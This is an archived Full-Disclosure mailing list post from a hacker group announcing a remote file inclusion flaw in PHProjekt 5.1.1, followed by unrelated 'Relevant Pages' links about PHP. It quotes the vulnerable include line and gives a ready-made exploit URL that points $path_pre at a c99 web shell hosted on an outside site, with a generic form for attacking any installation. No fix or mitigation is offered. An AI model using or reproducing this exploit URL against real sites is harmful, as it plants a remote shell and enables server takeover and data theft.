[Full-disclosure] Vuln ....



===============================================

# Found By Sp1deR_NeT ..

# E-mail :- Sp1deR_Net@xxxxxxxxxxx

# Site's :- WwW.Sp1deR-N3T.Com +++ WwW.Pal-HackinG.Com

# We Are :- PalEstine HackerS TeAm ..(Sp1deR_Net , MohajaLi , HACKERS PAL )

*************************************

Script :- PHP rojekt5.1.1

-----

Code Vuln :-

$include_path = $path_pre.'lib/lib.inc.php';
include_once($include_path)

In File :- editor_big.php

-----

Exploit : lib/specialdays.php?$path_pre=www.soqor.net/tools/c99.txt?

Example :- www.sitename.com/[path]/lib/specialdays.php?

$path_pre=www.soqor.net/tools/c99.txt?

-----

Sp1deR_Net@xxxxxxxxxxx

Sp1deR_NeT (((((((()))))))) ^__^

===============================================

_________________________________________________________________
Be the first to hear what's new at MSN - sign up to our free newsletters!
http://www.msn.co.uk/newsletters

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



Relevant Pages

  • PHP SCRIPT
    ... php classified script ... guestbook ardguest free php guestbook script ... php file upload script ...
    (sci.chem.labware)
  • Re: [PHP] PHP console script vs C/C++/C#
    ... My script is taking a longer time to execute than I want. ... I prefer to write in PHP because that is what I know best. ... This is why I am thinking about rewriting my whole script in a C language. ... Perhaps there are different methods I could be using to speed up execution. ...
    (php.general)
  • Re: How to Add a Feeback Form
    ... I saw nothing in that script that indicates where the form is e-mailed to so ... Greg Maxey/Word MVP ... PHP or not. ... have the support available yet. ...
    (microsoft.public.frontpage.programming)
  • How best to show PHP source? (was: One page, multiple submit buttons)
    ... script to add to the top of a PHP script to enable showing its ... Maybe anybody submitting their own PHP code for critique here ... Anything posted to a newsgroup is a "snapshot" of what the ... there ought to be a FAQ for this ...
    (comp.lang.php)
  • Email form script
    ... I have a web form that posts to a .php ... who cannot run .php on their server. ... Or does anyone have a .asp script that will ... Thank you for choosing FormToEmail by FormToEmail.com ...
    (microsoft.public.scripting.jscript)